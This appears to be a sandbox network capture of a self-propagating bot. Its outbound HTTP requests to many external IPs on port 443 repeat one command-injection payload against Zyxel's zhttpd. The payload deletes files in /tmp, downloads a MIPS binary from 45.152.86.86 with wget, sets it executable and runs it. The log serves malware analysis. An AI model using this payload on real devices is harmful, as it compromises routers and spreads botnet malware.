                                        Mar 31, 2024 09:20:16.082962036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        253192.168.2.236001227.16.108.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.082988977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        254192.168.2.2340290108.232.60.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083035946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        255192.168.2.2349472213.101.16.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083081961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        256192.168.2.2354888200.92.148.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083116055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        257192.168.2.234893251.168.185.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083159924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        258192.168.2.2336858166.179.22.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083189964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        259192.168.2.2343436103.242.88.199443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083244085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        260192.168.2.2350834223.46.23.90443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083322048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        261192.168.2.2335722167.42.201.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083354950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        262192.168.2.23552345.177.41.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083364010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        263192.168.2.2340592114.164.7.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083420038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        264192.168.2.235545473.252.108.58443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083467960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        265192.168.2.234307025.147.116.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083502054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        266192.168.2.235976889.105.97.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083542109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        267192.168.2.235759291.17.173.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083599091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        268192.168.2.2347094171.171.239.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083641052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        269192.168.2.2346094209.15.250.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083715916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        270192.168.2.2349526193.138.3.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083739042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        271192.168.2.2337424112.147.189.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083796978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        272192.168.2.235948057.2.190.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083838940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        273192.168.2.2344858151.79.18.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083894968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        274192.168.2.233543061.64.100.252443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083942890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        275192.168.2.2354262146.221.213.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.083966017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        276192.168.2.233876888.130.117.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084018946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        277192.168.2.2335472101.80.50.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084064007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        278192.168.2.233310076.194.219.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084110975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        279192.168.2.23542668.244.235.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084141970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        280192.168.2.2333030222.165.247.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084184885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        281192.168.2.235026066.77.239.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084223986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        282192.168.2.233566231.67.156.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084278107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        283192.168.2.234837089.39.175.107443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084338903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        284192.168.2.2347638165.78.197.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084383965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        285192.168.2.235929487.38.95.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084430933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        286192.168.2.2358828221.198.202.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084469080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        287192.168.2.234756041.165.195.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084507942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        288192.168.2.2350320145.154.37.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084559917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        289192.168.2.235252287.121.184.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084614038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        290192.168.2.234175290.57.32.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084665060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        291192.168.2.234921685.146.229.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084701061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        292192.168.2.2346528216.96.84.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084738970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        293192.168.2.235255877.139.160.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084795952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        294192.168.2.2334816200.10.52.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084830999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        295192.168.2.235828094.40.26.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084881067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        296192.168.2.2336634106.159.185.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084928989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        297192.168.2.2338410149.203.245.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.084961891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        298192.168.2.2357774191.232.126.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.085002899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        299192.168.2.2341012209.193.174.31443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.085041046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        300192.168.2.2360616106.57.194.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.085082054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        301192.168.2.234890892.157.205.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.085110903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        302192.168.2.233994642.212.130.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.085139990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        303192.168.2.2353836107.226.202.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.085192919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        304192.168.2.235382246.183.235.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.085225105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        305192.168.2.2355136170.178.34.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.085278034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        306192.168.2.234463627.239.94.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.085318089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        307192.168.2.235021235.60.116.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.085374117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        308192.168.2.236010264.45.87.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.090893984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        309192.168.2.2341014212.39.250.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.090926886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        310192.168.2.2359904220.61.234.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.090953112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        311192.168.2.233548438.74.17.251443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.090984106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        312192.168.2.233706649.189.5.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.091037035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        313192.168.2.2344760102.207.108.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.091053963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        314192.168.2.23566569.98.24.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.091090918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        315192.168.2.23477489.181.13.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.091118097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        316192.168.2.233753843.145.47.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.091165066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        317192.168.2.236087217.146.206.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.091192007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        318192.168.2.2349192200.112.4.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.091254950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        319192.168.2.2350920131.73.39.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.091290951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        320192.168.2.2352158113.232.148.240443
                                        TimestampBytes transferredDirectionData
